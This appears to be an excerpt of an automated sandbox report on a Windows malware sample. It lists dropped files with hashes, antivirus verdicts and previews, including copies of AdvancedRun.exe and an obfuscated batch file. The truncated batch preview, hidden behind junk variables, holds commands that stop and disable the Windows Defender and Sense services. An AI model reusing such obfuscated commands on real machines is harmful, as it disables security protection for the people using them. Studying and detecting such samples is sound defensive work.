                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0uko0qtt.v1f.psm1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_54v3gsur.dvq.ps1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5z51jnmi.3bc.ps1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_afkkkgq1.y0i.ps1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_duwzq4u5.ro3.psm1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_grxndcbs.jvz.psm1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h5nm0hzg.gxy.ps1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k0bhscjr.xhy.ps1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mo22qrr4.kn0.psm1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nein1cmy.5m1.psm1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ojwwilnd.ypi.ps1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q2gw4bjc.itm.ps1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sqnhaj14.abr.ps1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z5xybjsm.dfn.psm1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe
                                                                                                                  Process:C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):0
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                                  MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                  SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                                  SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                                  SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\test.bat
                                                                                                                  Process:C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe
                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):0
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                                  MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                                  SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                                  SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                                  SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                                  C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe
                                                                                                                  Process:C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):91000
                                                                                                                  Entropy (8bit):6.241345766746317
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                                  MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                  SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                                  SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                                  SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\test.bat
                                                                                                                  Process:C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe
                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8399
                                                                                                                  Entropy (8bit):4.665734428420432
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                                  MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                                  SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                                  SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                                  SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                                  C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):91000
                                                                                                                  Entropy (8bit):6.241345766746317
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                                  MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                  SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                                  SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                                  SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\test.bat
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe
                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8399
                                                                                                                  Entropy (8bit):4.665734428420432
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                                  MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                                  SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                                  SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                                  SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                                  C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe
                                                                                                                  Process:C:\Users\user\Desktop\VknMvPoCXZ.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):91000
                                                                                                                  Entropy (8bit):6.241345766746317
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                                  MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                  SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                                  SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                                  SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Reputation:unknown
